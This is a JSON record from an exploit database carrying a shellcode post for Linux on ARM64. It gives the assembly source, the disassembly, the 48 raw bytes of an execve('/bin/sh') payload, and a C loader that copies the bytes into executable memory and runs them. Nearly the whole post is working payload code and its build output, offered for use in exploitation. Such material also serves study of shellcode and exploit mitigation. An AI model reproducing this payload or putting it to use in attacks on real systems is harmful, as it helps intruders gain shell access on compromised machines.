{"id": "1337DAY-ID-32923", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "Linux/ARM64 - execve(/bin/sh, [/bin/sh], NULL) Shellcode (48 Bytes)", "description": "", "published": "2019-07-01T00:00:00", "modified": "2019-07-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/32923", "reporter": "Ken Kitahara", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2023-03-13T20:54:16", "viewCount": 132, "enchantments": {"dependencies": {}, "score": {"value": -0.2, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "_state": {"dependencies": 1678740900, "score": 1678741110, "epss": 1678879025}, "_internal": {"score_hash": "656ff73f925efaeba34fa40b58220edd"}, "sourceHref": "https://0day.today/exploit/32923", "sourceData": "/*\n# Title: Linux/ARM64 - execve(\"/bin/sh\", [\"/bin/sh\"], NULL) Shellcode (48 Bytes)\n# Date: 2019-06-30\n# Tested: Ubuntu 16.04 (aarch64)\n# Author: Ken Kitahara\n# Compilation: gcc -o loader loader.c\n\n\n[email\u00a0protected]:~/works$ lsb_release -a\nNo LSB modules are available.\nDistributor ID:\tUbuntu\nDescription:\tUbuntu Xenial Xerus (development branch)\nRelease:\t16.04\nCodename:\txenial\n[email\u00a0protected]:~/works$ uname -a\nLinux ubuntu 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:00:45 UTC 2015 aarch64 aarch64 aarch64 GNU/Linux\n[email\u00a0protected]:~/works$ cat execve2.s\n.section .text\n.global _start\n_start:\n // execve(\"/bin/sh\", [\"/bin/sh\"], NULL)\n mov x1, #0x622F // x1 = 0x000000000000622F (\"b/\")\n movk x1, #0x6E69, lsl #16 // x1 = 0x000000006E69622F (\"nib/\")\n movk x1, #0x732F, lsl #32 // x1 = 0x0000732F6E69622F (\"s/nib/\")\n movk x1, #0x68, lsl #48 // x1 = 0x0068732F6E69622F (\"hs/nib/\")\n str x1, [sp, #-8]! // push x1\n mov x2, xzr // args[2] = x2 = NULL\n add x0, sp, x2 // args[0] = x0 = pointer to \"/bin/sh\\0\"\n str x2, [sp, #-8]! // push x2\n str x0, [sp, #-8]! // push x0\n add x1, sp, x2 // args[1] = x1 = [\"/bin/sh\", NULL]\n mov x8, #221 // Systemcall Number = 221 (execve)\n svc #0x1337 // Invoke Systemcall\n[email\u00a0protected]:~/works$ as -o execve2.o execve2.s && ld -o execve2 execve2.o\n[email\u00a0protected]:~/works$ objdump -d ./execve2\n\n./execve2: file format elf64-littleaarch64\n\n\nDisassembly of section .text:\n\n0000000000400078 <_start>:\n 400078:\td28c45e1 \tmov\tx1, #0x622f \t// #25135\n 40007c:\tf2adcd21 \tmovk\tx1, #0x6e69, lsl #16\n 400080:\tf2ce65e1 \tmovk\tx1, #0x732f, lsl #32\n 400084:\tf2e00d01 \tmovk\tx1, #0x68, lsl #48\n 400088:\tf81f8fe1 \tstr\tx1, [sp,#-8]!\n 40008c:\taa1f03e2 \tmov\tx2, xzr\n 400090:\t8b2263e0 \tadd\tx0, sp, x2\n 400094:\tf81f8fe2 \tstr\tx2, [sp,#-8]!\n 400098:\tf81f8fe0 \tstr\tx0, [sp,#-8]!\n 40009c:\t8b2263e1 \tadd\tx1, sp, x2\n 4000a0:\td2801ba8 \tmov\tx8, #0xdd \t// #221\n 4000a4:\td40266e1 \tsvc\t#0x1337\n[email\u00a0protected]:~/works$ objcopy -O binary execve2 execve2.bin\n[email\u00a0protected]:~/works$ hexdump -v -e '\"\\\\\"\"x\" 1/1 \"%02x\" \"\"' execve2.bin && echo\n\\xe1\\x45\\x8c\\xd2\\x21\\xcd\\xad\\xf2\\xe1\\x65\\xce\\xf2\\x01\\x0d\\xe0\\xf2\\xe1\\x8f\\x1f\\xf8\\xe2\\x03\\x1f\\xaa\\xe0\\x63\\x22\\x8b\\xe2\\x8f\\x1f\\xf8\\xe0\\x8f\\x1f\\xf8\\xe1\\x63\\x22\\x8b\\xa8\\x1b\\x80\\xd2\\xe1\\x66\\x02\\xd4\n\n*/\n\n#include <stdio.h>\n#include <sys/mman.h>\n#include <string.h>\n#include <stdlib.h>\n\nint (*sc)();\n\nchar shellcode[] =\n\"\\xe1\\x45\\x8c\\xd2\\x21\\xcd\\xad\\xf2\\xe1\\x65\\xce\\xf2\\x01\\x0d\\xe0\\xf2\"\n\"\\xe1\\x8f\\x1f\\xf8\\xe2\\x03\\x1f\\xaa\\xe0\\x63\\x22\\x8b\\xe2\\x8f\\x1f\\xf8\"\n\"\\xe0\\x8f\\x1f\\xf8\\xe1\\x63\\x22\\x8b\\xa8\\x1b\\x80\\xd2\\xe1\\x66\\x02\\xd4\";\n\nint main(int argc, char **argv) {\n printf(\"Shellcode Length: %zd Bytes\\n\", strlen(shellcode));\n\n void *ptr = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);\n\n if (ptr == MAP_FAILED) {\n perror(\"mmap\");\n exit(-1);\n }\n\n memcpy(ptr, shellcode, sizeof(shellcode));\n sc = ptr;\n\n sc();\n\n return 0;\n}\n", "category": "shellcode", "verified": true}